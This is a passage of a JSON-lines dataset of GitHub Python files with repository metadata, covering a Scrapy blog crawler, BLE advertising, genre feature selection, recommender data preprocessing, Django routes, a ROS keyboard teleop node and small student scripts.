  • \n doc.attrib.clear()\n\n # remove empty links without childrens. e.g. name anchors\n for e in doc.xpath('//a'):\n if not e.getchildren() and not e.text:\n e.drop_tag()\n\n # remove comment owner info\n for e in doc.xpath('//div[@class=\"comment-owner\"]'):\n e.drop_tree()\n\n return lxml.html.tostring(doc)\n\n\nclass ElggBlogAuthorLoader(BlogAuthorLoader):\n profile_url_out = Compose(BlogAuthorLoader.default_output_processor,\n strip_profile_url)\n\n\nclass ElggBlogPostLoader(BlogPostLoader):\n content_out = Compose(BlogPostLoader.default_output_processor,\n clean_post)\n posted_out = Compose(BlogPostLoader.default_output_processor,\n StringToDatetime('%B %d, %Y'))\n\n\nclass ElggCommentAuthorLoader(CommentAuthorLoader):\n profile_url_out = Compose(CommentAuthorLoader.default_output_processor,\n strip_profile_url)\n\n\nclass ElggCommentPostLoader(CommentPostLoader):\n content_out = Compose(CommentPostLoader.default_output_processor,\n clean_comment)\n posted_out = Compose(CommentPostLoader.default_output_processor,\n lambda s: s.split(' on ')[1],\n StringToDatetime('%A, %d %B %Y, %H:%M %Z |'))\n\n\n\nclass ElggBlogArchiveSpider(CrawlSpider):\n\n username = None\n domain = None\n\n archive_url = 'http://%(domain)s/%(username)s/weblog/archive/'\n\n content_selector_id = ''\n content_selector_xpath = ''\n\n post_loader = ElggBlogPostLoader\n author_loader = ElggBlogAuthorLoader\n comment_loader = ElggCommentPostLoader\n comment_author_loader = ElggCommentAuthorLoader\n\n def __init__(self):\n assert self.username and self.domain\n self.allowed_domains = [self.domain]\n self.start_urls = [self.archive_url % {'username': self.username,\n 'domain': self.domain}]\n\n archives_le = SgmlLinkExtractor(allow=self.get_archive_links_re(),\n restrict_xpaths=self.get_archive_links_xpath())\n posts_le = SgmlLinkExtractor(allow=self.get_post_links_re(),\n restrict_xpaths=self.get_post_links_xpath())\n\n self.rules = (\n Rule(archives_le, follow=True),\n Rule(posts_le, callback='parse_post'),\n )\n\n super(ElggBlogArchiveSpider, self).__init__()\n\n def get_content_xpath(self):\n if self.content_selector_xpath:\n return self.content_selector_xpath\n else:\n return '//div[@id=\"%s\"]' % self.content_selector_id\n\n def get_archive_links_re(self):\n return r'/archive/\\d{4}/\\d{2}/'\n\n def get_archive_links_xpath(self):\n return '%s/ul/li' % self.get_content_xpath()\n\n def get_post_links_re(self):\n return r'/weblog/.+'\n\n def get_post_links_xpath(self):\n return '%s//div[@class=\"weblog-title\"]' % self.get_content_xpath()\n\n def get_post_author_xpaths(self):\n \"\"\"\n Returns a tuple of xpath rules (container, name, profile_url, avatar_url)\n \"\"\"\n return ('%s//div[@class=\"user\"]' % self.get_content_xpath(),\n './/a[2]/text()',\n './/a[2]/@href',\n './/img/@src')\n\n def get_post_xpaths(self):\n \"\"\"\n Returns a tuple of xpath rules:\n (container, title, content, tags, posted)\n\n Does not return origin_url because is taked from response.url\n \"\"\"\n return (self.get_content_xpath(),\n './/div[@class=\"weblog-title\"]//text()',\n './div[@class=\"weblog-post\"]/div[@class=\"post\"]',\n # only extract tags with links\n './/div[@class=\"weblog_keywords\"]//a/text()',\n './/h2[@class=\"weblog_dateheader\"]/text()',\n )\n\n def get_comments_xpath(self):\n return '%s//div[@id=\"comments\"]/ol/li' % self.get_content_xpath()\n\n def get_comment_author_xpath(self):\n \"\"\"\n Returns a tuple of relative xpath rules to each comment xpath rule:\n (container, name, profile_url, avatar_url)\n \"\"\"\n return ('./div[@class=\"comment-owner\"]/p',\n './a[2]/text()',\n './a[2]/@href',\n './a[1]/img/@src',\n )\n\n def get_comment_post_xpath(self):\n \"\"\"\n Returns a tuple of relative xpath rules to each comment xpath rule:\n (container, content, posted, origin_url)\n \"\"\"\n return ('.',\n '.',\n './div[@class=\"comment-owner\"]/p/text()',\n './div[@class=\"comment-owner\"]/p/a[3]/@href',\n )\n\n def parse_post_author(self, response):\n hxs = HtmlXPathSelector(response)\n container, name, profile_url, avatar_url = self.get_post_author_xpaths()\n\n author = self.author_loader(selector=hxs.select(container))\n author.add_xpath('name', name)\n author.add_xpath('profile_url', profile_url)\n author.add_xpath('avatar_url', avatar_url)\n\n return author.load_item()\n\n def parse_post_comments(self, response):\n hxs = HtmlXPathSelector(response)\n\n (author_container,\n author_name,\n author_profile_url,\n author_avatar_url) = self.get_comment_author_xpath()\n\n (container, content,\n posted, origin_url) = self.get_comment_post_xpath()\n\n comment_list = []\n for comment in hxs.select(self.get_comments_xpath()):\n author = self.comment_author_loader(selector=comment.select(author_container))\n author.add_xpath('name', author_name)\n author.add_xpath('profile_url', author_profile_url)\n author.add_xpath('avatar_url', author_avatar_url)\n\n comment = self.comment_loader(selector=comment.select(container))\n comment.add_xpath('content', content)\n comment.add_xpath('posted', posted)\n comment.add_xpath('origin_url', origin_url)\n\n comment.add_value('author', [author.load_item()])\n\n comment_list.append(comment.load_item())\n\n return comment_list\n\n def parse_post(self, response):\n hxs = HtmlXPathSelector(response)\n container, title, content, tags, posted = self.get_post_xpaths()\n\n post = self.post_loader(selector=hxs.select(container))\n post.add_value('origin_url', [unicode(response.url)])\n post.add_xpath('title', title)\n post.add_xpath('content', content)\n post.add_xpath('tags', tags)\n post.add_xpath('posted', posted)\n\n author = self.parse_post_author(response)\n post.add_value('author', [author])\n\n comments = self.parse_post_comments(response)\n post.add_value('comments', comments)\n\n return post.load_item()\n","repo_name":"rmax/rho-blogs-crawler","sub_path":"rho_blogs/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"74544429236","text":"import ubluetooth\nfrom micropython import const\nimport ubinascii\n\nclass TEST_BLE:\n def __init__(self):\n self.ble = ubluetooth.BLE()\n if self.ble.active() == False:\n self.ble.active(True)\n self.show_bt_mac()\n\n def show_bt_mac(self):\n address_str = ubinascii.hexlify(self.ble.config(\"mac\")[1]).decode()\n print(\"BLE_MAC : \" + address_str)\n \n def adv(self):\n print(\"ble_advertise_start\")\n send_str = \"BLE,\"\n send_data = send_str.encode()\n self.ble.gap_advertise(20000 , adv_data=send_data)\n\nif __name__ == \"__main__\":\n # BLE通信\n print(\"adv start\")\n gps_ble = TEST_BLE() \n gps_ble.adv()","repo_name":"cdsl-research/C0119360_B4","sub_path":"late_term/rssi_test/ble_adv.py","file_name":"ble_adv.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73550798196","text":"import sys\nfrom numpy import load, std, mean, vstack, array, reshape, save\nfrom sklearn import preprocessing\nfrom operator import itemgetter\nfrom constants import NUMBER_OF_FEATURES, NUMBER_OF_TRAINING_FEATURES, SIMILARITY_WEIGHT, SCORE_EXP, ALL_TRAINING_FEATURES_DATA_DIR, OPTIMAL_TRAINING_FEATURES_DIR, OPTIMAL_TRAINING_FEATURES_DATA_DIR\nfrom scale_data import scale_data_single\nfrom k_nearest_neighbor import find_optimal_k\n\ndef get_features_sorted_by_same_genre_similarity(all_training_features):\n genre_stds = []\n for feature_index in range(NUMBER_OF_FEATURES):\n genre_stds.append(({\n 'min': [],\n 'mean': [],\n 'max': []\n }))\n\n for genre, features in all_training_features.items():\n for feature_index, feature in enumerate(features):\n for prop, prop_values in feature.items():\n genre_stds[feature_index][prop].append(std(prop_values))\n\n average_genre_stds = {\n 'min': [0] * NUMBER_OF_FEATURES,\n 'mean': [0] * NUMBER_OF_FEATURES,\n 'max': [0] * NUMBER_OF_FEATURES\n }\n\n for feature_index, feature in enumerate(genre_stds):\n for prop, prop_stds in feature.items():\n average_genre_stds[prop][feature_index] = mean(prop_stds)\n\n scaled_average_genre_stds = {}\n for prop, stds in average_genre_stds.items():\n stds = array(stds).reshape(-1, 1)\n scaler = preprocessing.MinMaxScaler(feature_range = (0, 1)).fit(stds)\n scaled_average_genre_stds[prop] = scaler.transform(stds)\n\n feature_props = []\n for prop, scaled_average_genre_feature_stds in scaled_average_genre_stds.items():\n for feature_index, scaled_average_genre_feature_std in enumerate(scaled_average_genre_feature_stds):\n feature_id = feature_index + 1\n feature_name = str(feature_id) + '_' + prop\n feature_props.append({\n 'feature_id': feature_id,\n 'feature_prop': prop,\n 'feature_name': feature_name,\n 'std': scaled_average_genre_feature_std[0]\n })\n\n features_sorted_by_same_genre_similarity = sorted(feature_props, key=itemgetter('std'))\n return features_sorted_by_same_genre_similarity\n\n\ndef get_features_sorted_by_genre_difference(all_training_features):\n combined_genre_feature_prop_averages = []\n for feature_index in range(NUMBER_OF_FEATURES):\n combined_genre_feature_prop_averages.append({\n 'min': [],\n 'mean': [],\n 'max': []\n })\n\n for genre, features in all_training_features.items():\n for feature_index, feature in enumerate(features):\n for prop, prop_values in feature.items():\n combined_genre_feature_prop_averages[feature_index][prop].append(mean(prop_values))\n\n feature_props = []\n for feature_index, feature in enumerate(combined_genre_feature_prop_averages):\n for prop, prop_averages in feature.items():\n feature_id = feature_index + 1\n feature_name = str(feature_id) + '_' + prop\n feature_props.append({\n 'feature_id': feature_id,\n 'feature_prop': prop,\n 'feature_name': feature_name,\n 'std': std(prop_averages)\n })\n\n features_sorted_by_genre_difference = sorted(feature_props, key=itemgetter('std'), reverse=True)\n return features_sorted_by_genre_difference\n\ndef get_sorted_features(features_sorted_by_same_genre_similarity, features_sorted_by_genre_difference):\n scored_features = []\n for index, feature in enumerate(features_sorted_by_same_genre_similarity):\n same_genre_similarity_score = (index ** SCORE_EXP) * SIMILARITY_WEIGHT\n genre_difference_score = (list(map(itemgetter('feature_name'), features_sorted_by_genre_difference)).index(feature['feature_name']) ** SCORE_EXP) * (1 - SIMILARITY_WEIGHT)\n scored_features.append({\n 'feature_id': feature['feature_id'],\n 'feature_prop': feature['feature_prop'],\n 'score': same_genre_similarity_score + genre_difference_score\n })\n\n sorted_features = sorted(scored_features, key=itemgetter('score'))\n return sorted_features\n\n\ndef find_optimal_training_features(all_training_features):\n features_sorted_by_same_genre_similarity = get_features_sorted_by_same_genre_similarity(all_training_features)\n features_sorted_by_genre_difference = get_features_sorted_by_genre_difference(all_training_features)\n sorted_features = get_sorted_features(features_sorted_by_same_genre_similarity, features_sorted_by_genre_difference)\n return sorted_features[0:NUMBER_OF_TRAINING_FEATURES]\n\ndef save_optimal_training_features(all_training_features, optimal_training_features):\n optimal_training_features_data = {\n 'X_train': [],\n 'y_train': [],\n 'k': 0\n }\n\n for genre, features in all_training_features.items():\n genre_X_train = []\n genre_y_train = []\n for song_index in range(len(features[0]['min'])):\n genre_X_train.append([])\n genre_y_train.append(genre)\n\n for feature_index, feature in enumerate(features):\n feature_id = feature_index + 1\n for prop, prop_values in feature.items():\n if any(f['feature_id'] == feature_id and f['feature_prop'] == prop for f in optimal_training_features):\n for song_index, prop_value in enumerate(prop_values):\n genre_X_train[song_index].append(prop_value)\n\n optimal_training_features_data['X_train'].extend(genre_X_train)\n optimal_training_features_data['y_train'].extend(genre_y_train)\n\n X_train_scale = scale_data_single(optimal_training_features_data['X_train'])\n optimal_training_features_data['k'] = find_optimal_k(X_train_scale, optimal_training_features_data['y_train'])\n\n save(OPTIMAL_TRAINING_FEATURES_DIR, optimal_training_features)\n save(OPTIMAL_TRAINING_FEATURES_DATA_DIR, optimal_training_features_data)\n\n\ndef main(argv):\n all_training_features = load(ALL_TRAINING_FEATURES_DATA_DIR).item()\n optimal_training_features = find_optimal_training_features(all_training_features)\n save_optimal_training_features(all_training_features, optimal_training_features)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"arvidede/music-genre-classification","sub_path":"generate_optimal_training_features.py","file_name":"generate_optimal_training_features.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"18135327178","text":"# coding: utf-8\n\n\"\"\"\nData pre-processing\n##########################\n\"\"\"\nfrom logging import getLogger\nfrom collections import Counter\nimport os, copy\nimport pandas as pd\nimport numpy as np\nimport time\n#from torch.utils.data import Dataset\n\n\nclass RecDataset(object):\n def __init__(self, config, df=None):\n self.config = config\n self.dataset_path = os.path.abspath(config['data_path'])\n self.preprocessed_dataset_path = os.path.abspath(config['preprocessed_data'])\n self.preprocessed_loaded = False # if preprocessed data loaded?\n self.logger = getLogger()\n self.dataset_name = config['dataset']\n\n # dataframe\n self.uid_field = self.config['USER_ID_FIELD']\n self.iid_field = self.config['ITEM_ID_FIELD']\n self.ts_id = self.config['TIME_FIELD']\n\n if df is not None:\n self.df = df\n return\n self.ui_core_splitting_str = self._k_core_and_splitting()\n self.processed_data_name = '{}_{}_processed.inter'.format(self.dataset_name, self.ui_core_splitting_str)\n # load from preprocessed path?\n if self.config['load_preprocessed'] and self._load_preprocessed_dataset():\n self.preprocessed_loaded = True\n self.logger.info('\\nData loaded from preprocessed dir: ' + self.preprocessed_dataset_path + '\\n')\n return\n # load dataframe\n self._from_scratch()\n # pre-processing\n self._data_processing()\n\n def _k_core_and_splitting(self):\n user_min_n = 1\n item_min_n = 1\n if self.config['min_user_inter_num'] is not None:\n user_min_n = max(self.config['min_user_inter_num'], 1)\n if self.config['min_item_inter_num'] is not None:\n item_min_n = max(self.config['min_item_inter_num'], 1)\n # splitting\n ratios = self.config['split_ratio']\n tot_ratio = sum(ratios)\n # remove 0.0 in ratios\n ratios = [i for i in ratios if i > .0]\n ratios = [str(int(_ * 10 / tot_ratio)) for _ in ratios]\n s = ''.join(ratios)\n return 'u{}i{}_s'.format(user_min_n, item_min_n) + s\n\n def _load_preprocessed_dataset(self):\n file_path = os.path.join(self.preprocessed_dataset_path, self.processed_data_name)\n if not os.path.isfile(file_path):\n return False\n # load\n self.df = self._load_df_from_file(file_path, self.config['load_cols']+[self.config['preprocessed_data_splitting']])\n return True\n\n def _from_scratch(self):\n \"\"\"Load dataset from scratch.\n Initialize attributes firstly, then load data from atomic files, pre-process the dataset lastly.\n \"\"\"\n self.logger.info('Loading {} from scratch'.format(self.__class__))\n # get path\n file_path = os.path.join(self.dataset_path, '{}.inter'.format(self.dataset_name))\n if not os.path.isfile(file_path):\n raise ValueError('File {} not exist'.format(file_path))\n self.df = self._load_df_from_file(file_path, self.config['load_cols'])\n\n def _load_df_from_file(self, file_path, load_columns):\n # read header(user_id:token item_id:token rating:float timestamp:float) for ml-10k\n cnt = 0\n with open(file_path, 'r') as f:\n head = f.readline()[:-1]\n field_separator = self.config['field_separator']\n # only use [user_id, item_id, timestamp]\n for field_type in head.split(field_separator):\n if field_type in load_columns:\n cnt += 1\n # all cols exist\n if cnt != len(load_columns):\n raise ValueError('File {} lost some required columns.'.format(file_path))\n\n df = pd.read_csv(file_path, sep=self.config['field_separator'], usecols=load_columns)\n return df\n\n def _data_processing(self):\n \"\"\"Data preprocessing, including:\n - K-core data filtering\n - Remap ID\n \"\"\"\n # drop N/A value\n self.df.dropna(inplace=True)\n # remove duplicate rows\n self.df.drop_duplicates(inplace=True)\n # perform k-core\n self._filter_by_k_core(self.df)\n # remap ID\n self._reset_index(self.df)\n\n def _filter_by_k_core(self, df):\n \"\"\"Filter by number of interaction.\n\n Upper/Lower bounds can be set, only users/items between upper/lower bounds can be remained.\n See :doc:`../user_guide/data/data_args` for detail arg setting.\n\n Note:\n Lower bound is also called k-core filtering, which means this method will filter loops\n until all the users and items has at least k interactions.\n \"\"\"\n while True:\n ban_users = self._get_illegal_ids_by_inter_num(df, field=self.uid_field,\n max_num=self.config['max_user_inter_num'],\n min_num=self.config['min_user_inter_num'])\n ban_items = self._get_illegal_ids_by_inter_num(df, field=self.iid_field,\n max_num=self.config['max_item_inter_num'],\n min_num=self.config['min_item_inter_num'])\n\n if len(ban_users) == 0 and len(ban_items) == 0:\n return\n\n dropped_inter = pd.Series(False, index=df.index)\n if self.uid_field:\n dropped_inter |= df[self.uid_field].isin(ban_users)\n if self.iid_field:\n dropped_inter |= df[self.iid_field].isin(ban_items)\n # self.logger.info('[{}] dropped interactions'.format(len(dropped_inter)))\n df.drop(df.index[dropped_inter], inplace=True)\n\n def _get_illegal_ids_by_inter_num(self, df, field, max_num=None, min_num=None):\n \"\"\"Given inter feat, return illegal ids, whose inter num out of [min_num, max_num]\n\n Args:\n field (str): field name of user_id or item_id.\n feat (pandas.DataFrame): interaction feature.\n max_num (int, optional): max number of interaction. Defaults to ``None``.\n min_num (int, optional): min number of interaction. Defaults to ``None``.\n\n Returns:\n set: illegal ids, whose inter num out of [min_num, max_num]\n \"\"\"\n self.logger.debug('\\n get_illegal_ids_by_inter_num:\\n\\t field=[{}], max_num=[{}], min_num=[{}]'.format(\n field, max_num, min_num\n ))\n\n if field is None:\n return set()\n if max_num is None and min_num is None:\n return set()\n\n max_num = max_num or np.inf\n min_num = min_num or -1\n\n ids = df[field].values\n inter_num = Counter(ids)\n ids = {id_ for id_ in inter_num if inter_num[id_] < min_num or inter_num[id_] > max_num}\n\n self.logger.debug('[{}] illegal_ids_by_inter_num, field=[{}]'.format(len(ids), field))\n return ids\n\n def _reset_index(self, df):\n if df.empty:\n raise ValueError('Some feat is empty, please check the filtering settings.')\n df.reset_index(drop=True, inplace=True)\n\n def split(self, ratios):\n \"\"\"Split interaction records by ratios.\n\n Args:\n ratios (list): List of split ratios. No need to be normalized.\n group_by (str, optional): Field name that interaction records should grouped by after splitting.\n Defaults to ``None``\n\n Returns:\n list: List of :class:`~Dataset`, whose interaction features has been splitted.\n\n Note:\n Other than the first one, each part is rounded down.\n \"\"\"\n if self.preprocessed_loaded:\n dfs = []\n splitting_label = self.config['preprocessed_data_splitting']\n # splitting into training/validation/test\n for i in range(3):\n temp_df = self.df[self.df[splitting_label] == i].copy()\n temp_df.drop(splitting_label, inplace=True, axis=1)\n dfs.append(temp_df)\n # wrap as RecDataset\n full_ds = [self.copy(_) for _ in dfs]\n return full_ds\n\n tot_ratio = sum(ratios)\n # remove 0.0 in ratios\n ratios = [i for i in ratios if i > .0]\n ratios = [_ / tot_ratio for _ in ratios]\n\n # get split global time\n split_ratios = np.cumsum(ratios)[:-1]\n split_timestamps = list(np.quantile(self.df[self.ts_id], split_ratios))\n\n # get df training dataset unique users/items\n df_train = self.df.loc[self.df[self.ts_id] < split_timestamps[0]]\n self.logger.info('==Splitting: 1. Reindexing and filtering out new users/items not in train dataset...')\n\n uni_users = pd.unique(df_train[self.uid_field])\n uni_items = pd.unique(df_train[self.iid_field])\n # re_index users & items\n u_id_map = {k: i for i, k in enumerate(uni_users)}\n i_id_map = {k: i for i, k in enumerate(uni_items)}\n self.df[self.uid_field] = self.df[self.uid_field].map(u_id_map)\n self.df[self.iid_field] = self.df[self.iid_field].map(i_id_map)\n # filter out Nan line\n self.df.dropna(inplace=True)\n # as int\n self.df = self.df.astype(int)\n\n # split df based on global time\n self.logger.info('==Splitting: 2. Train/Valid/Test.')\n dfs = []\n start = 0\n for i in split_timestamps:\n dfs.append(self.df.loc[(start <= self.df[self.ts_id]) & (self.df[self.ts_id] < i)].copy())\n start = i\n # last\n dfs.append(self.df.loc[start <= self.df[self.ts_id]].copy())\n\n # save to disk\n self.logger.info('==Splitting: 3. Dumping...')\n self._save_dfs_to_disk(u_id_map, i_id_map, dfs)\n # self._drop_cols(dfs+[self.df], [self.ts_id])\n\n # wrap as RecDataset\n full_ds = [self.copy(_) for _ in dfs]\n return full_ds\n\n def _save_dfs_to_disk(self, u_map, i_map, dfs):\n if self.config['load_preprocessed'] and not self.preprocessed_loaded:\n dir_name = self.preprocessed_dataset_path\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n # save id mapping\n u_df = pd.DataFrame(list(u_map.items()), columns=[self.uid_field, 'new_id'])\n i_df = pd.DataFrame(list(i_map.items()), columns=[self.iid_field, 'new_id'])\n u_df.to_csv(os.path.join(self.preprocessed_dataset_path,\n '{}_u_{}_mapping.csv'.format(self.dataset_name, self.ui_core_splitting_str)),\n sep=self.config['field_separator'], index=False)\n i_df.to_csv(os.path.join(self.preprocessed_dataset_path,\n '{}_i_{}_mapping.csv'.format(self.dataset_name, self.ui_core_splitting_str)),\n sep=self.config['field_separator'], index=False)\n # 0-training/1-validation/2-test\n for i, temp_df in enumerate(dfs):\n temp_df[self.config['preprocessed_data_splitting']] = i\n temp_df = pd.concat(dfs)\n temp_df.to_csv(os.path.join(self.preprocessed_dataset_path, self.processed_data_name),\n sep=self.config['field_separator'], index=False)\n self.logger.info('\\nData saved to preprocessed dir: \\n' + self.preprocessed_dataset_path)\n\n # def _drop_cols(self, dfs, col_names):\n # for _df in dfs:\n # _df.drop(col_names, inplace=True, axis = 1)\n\n def copy(self, new_df):\n \"\"\"Given a new interaction feature, return a new :class:`Dataset` object,\n whose interaction feature is updated with ``new_df``, and all the other attributes the same.\n\n Args:\n new_df (pandas.DataFrame): The new interaction feature need to be updated.\n\n Returns:\n :class:`~Dataset`: the new :class:`~Dataset` object, whose interaction feature has been updated.\n \"\"\"\n nxt = RecDataset(self.config, new_df)\n return nxt\n\n def num(self, field):\n \"\"\"Given ``field``, for token-like fields, return the number of different tokens after remapping,\n for float-like fields, return ``1``.\n\n Args:\n field (str): field name to get token number.\n\n Returns:\n int: The number of different tokens (``1`` if ``field`` is a float-like field).\n \"\"\"\n if field not in self.config['load_cols']:\n raise ValueError('field [{}] not defined in dataset'.format(field))\n uni_len = len(pd.unique(self.df[field]))\n return uni_len\n\n def shuffle(self):\n \"\"\"Shuffle the interaction records inplace.\n \"\"\"\n self.df = self.df.sample(frac=1, replace=False).reset_index(drop=True)\n\n def sort_by_chronological(self):\n self.df.sort_values(by=[self.ts_id], inplace=True, ignore_index=True)\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, idx):\n # Series result\n return self.df.iloc[idx]\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n info = [self.dataset_name]\n self.inter_num = len(self.df)\n uni_u = pd.unique(self.df[self.uid_field])\n uni_i = pd.unique(self.df[self.iid_field])\n if self.uid_field:\n self.user_num = len(uni_u)\n self.avg_actions_of_users = self.inter_num/self.user_num\n info.extend(['The number of users: {}'.format(self.user_num),\n 'Average actions of users: {}'.format(self.avg_actions_of_users)])\n if self.iid_field:\n self.item_num = len(uni_i)\n self.avg_actions_of_items = self.inter_num/self.item_num\n info.extend(['The number of items: {}'.format(self.item_num),\n 'Average actions of items: {}'.format(self.avg_actions_of_items)])\n info.append('The number of inters: {}'.format(self.inter_num))\n if self.uid_field and self.iid_field:\n sparsity = 1 - self.inter_num / self.user_num / self.item_num\n info.append('The sparsity of the dataset: {}%'.format(sparsity * 100))\n return '\\n'.join(info)\n","repo_name":"enoche/ImRec","sub_path":"utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":14272,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"4"} +{"seq_id":"32126875440","text":"import numpy as np\nfrom ballet import Feature\nfrom ballet.eng import SimpleFunctionTransformer\n\ninput = ['Lot Area', 'Lot Frontage']\ndef fill_frontage(df):\n mask = df['Lot Frontage'].isnull()\n df['Lot Frontage'][mask] = np.sqrt(df['Lot Area'])[mask]\n return df['Lot Frontage']\ntransformer = SimpleFunctionTransformer(fill_frontage)\nname = 'Lot Frontage Fill'\nfeature = Feature(input=input, transformer=transformer, name=name)\n","repo_name":"micahjsmith/ballet-ames-notebooks","sub_path":"features/user_08/feature_02.py","file_name":"feature_02.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31948321157","text":"import math\nimport matplotlib.pyplot as plt\n\n\ndef plot(x: list, y: list, x_new: list, y_new: list):\n plt.scatter(x, y, c='red')\n plt.scatter(x_new, y_new, c='blue')\n plt.legend(['old point', 'new point'])\n\n plt.axhline(0, c='gray')\n plt.axvline(0, c='gray')\n\n max_val = max(x + y + x_new + y_new) + 1\n min_val = min(x + y + x_new + y_new) - 1\n min_val = min(min_val, 0)\n\n plt.ylim((min_val, max_val))\n plt.xlim((min_val, max_val))\n plt.xlabel('x - axis')\n plt.ylabel('y - axis')\n plt.title('Point Transformation')\n plt.show()\n\n\ndef translate(x: int, y: int, tx: int, ty: int):\n x_new = [x + tx]\n y_new = [y + ty]\n plot([x], [y], x_new, y_new)\n\n\ndef scale(x: int, y: int, sx: float, sy: float):\n x_new = [x * sx]\n y_new = [y * sy]\n plot([x], [y], x_new, y_new)\n\n\ndef rotate(x: int, y: int, angle: float):\n x_new = [x * math.cos(angle) - y * math.sin(angle)]\n y_new = [x * math.sin(angle) + y * math.cos(angle)]\n plot([x], [y], x_new, y_new)\n\n\nx = int(input('Enter x: '))\ny = int(input('Enter y: '))\n\nprint('1. Translation\\n2. Scaling\\n3. Rotation')\nchoice = int(input('Enter a choice: '))\n\nassert (choice >= 1 and choice <= 3)\n\nif choice == 1:\n tx = int(input('Enter tx: '))\n ty = int(input('Enter ty: '))\n translate(x, y, tx, ty)\nelif choice == 2:\n sx = float(input('Enter sx: '))\n sy = float(input('Enter sy: '))\n scale(x, y, sx, sy)\nelse:\n angle = int(input('Enter theta in degrees: '))\n angle = (angle * math.pi) / 180\n rotate(x, y, angle)\n","repo_name":"rohitmalik776/cg-lab-dtu","sub_path":"point_transformations.py","file_name":"point_transformations.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"29852448071","text":"from pms.models import Notification\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n\tpath('', views.IndexView, name = \"index\"),\n\tpath('home/', views.HomeView, name = \"home\"),\n\tpath('createproject/', views.CreateProjectView, name = \"createproject\"),\n\tpath('projects/', views.ProjectsView, name = \"projects\"),\n\tpath('projects//', views.ProjectDetailsView, name = \"projectdetails\"),\n\tpath('projects/addnewlevel//', views.AddNewLevelView, name = \"addnewlevel\"),\n\tpath('projects/moveproject///', views.MoveProjectView, name = \"moveproject\"),\n\tpath('projects/changedetails//', views.ChangeProjectDetailsView, name = \"changedetails\"),\n\tpath('projects/addworker///', views.AddWorkersView, name = \"addworker\"),\n\tpath('projects/relieveworker///', views.RelieveFromProjectView, name = \"relieveworker\"),\n\tpath('notifications/', views.NotificationsView, name = \"notifications\"),\n\tpath('notifications/markasread//', views.NotificationMarkAsReadView, name = \"markasread\"),\n\n\n\t# AUTHENTICATION\n\tpath('login/', views.LoginView, name = \"login\"),\n\tpath('logout/', views.LogoutView, name = \"logout\"),\n\tpath('register/', views.RegisterView, name = \"register\"),\n]\n","repo_name":"j-yeskay/pms-django","sub_path":"pms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20246390819","text":"#!/usr/bin/env python\n\nimport rospy\nfrom race.msg import drive_param\nimport curses\n#import signal\n#TIMEOUT = 0.1 # number of seconds your want for timeout\nforward = 0;\nleft = 0;\n\n# def interrupted(signum, frame):\n# \"called when read times out\"\n# global forward\n# forward = 0\n# global left\n# left = 0\n# stdscr.addstr(2, 20, \"Stop\")\n# stdscr.addstr(2, 25, '%.2f' % forward)\n# stdscr.addstr(3, 20, \"Stop\")\n# stdscr.addstr(3, 25, '%.2f' % left)\n# signal.signal(signal.SIGALRM, interrupted)\n\n# def input():\n# try:\n# foo = stdscr.getch()\n# return foo\n# except:\n# # timeout\n# return\n\nstdscr = curses.initscr()\ncurses.cbreak()\nstdscr.keypad(1)\nrospy.init_node('keyboard_talker')\npub = rospy.Publisher('drive_parameters', drive_param, queue_size=10)\n\n# set alarm\n#signal.alarm(TIMEOUT)\n#s = input()\n# disable the alarm after success\n#signal.alarm(0)\n#print 'You typed', s\n\nstdscr.refresh()\n\nkey = ''\nwhile key != ord('q'):\n#\tsignal.setitimer(signal.ITIMER_REAL,0.05)\n#\tkey = input()\n\tkey = stdscr.getch()\n\tstdscr.refresh()\n#\tsignal.alarm(0)\n\tif key == curses.KEY_UP: \n\t\tforward = forward + 1;\n\t\tstdscr.addstr(2, 20, \"Up \")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_DOWN:\n\t\tforward = forward - 1; \n\t\tstdscr.addstr(2, 20, \"Down\")\n\t\tstdscr.addstr(2, 25, '%.2f' % forward)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_LEFT:\n\t\tleft = left - 1; \n\t\tstdscr.addstr(3, 20, \"left\")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\telif key == curses.KEY_RIGHT:\n\t\tleft = left + 1; \n\t\tstdscr.addstr(3, 20, \"rgt \")\n\t\tstdscr.addstr(3, 25, '%.2f' % left)\n\t\tstdscr.addstr(5, 20, \" \")\n\tif key == curses.KEY_DC:\n\t\tleft = 0\n\t\tforward = 0\n\t\tstdscr.addstr(5, 20, \"Stop\")\n\tmsg = drive_param()\n\tmsg.velocity = forward\n\tmsg.angle = left\n\tpub.publish(msg)\ncurses.endwin()\n","repo_name":"f1tenth/F110CPSWeek2018","sub_path":"Unimore/drivebox-tenth/src/f1tenth/race/src/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"4"} +{"seq_id":"29353905081","text":"import csv\n\ndef new_user():\n with open(\"user.csv\",\"a\",newline=\"\") as f: \n read = csv.reader(f)\n for i in csv.read:\n print(i)\n try:\n user = [i for i in read]\n except:\n id = 0\n\n for i in user:\n print (i)\n if id != 0:\n id = user[0] + 1\n\n nam = input(\"Enter name: \")\n\n score = 0\n\n n_user = [id,nam,score]\n\n with 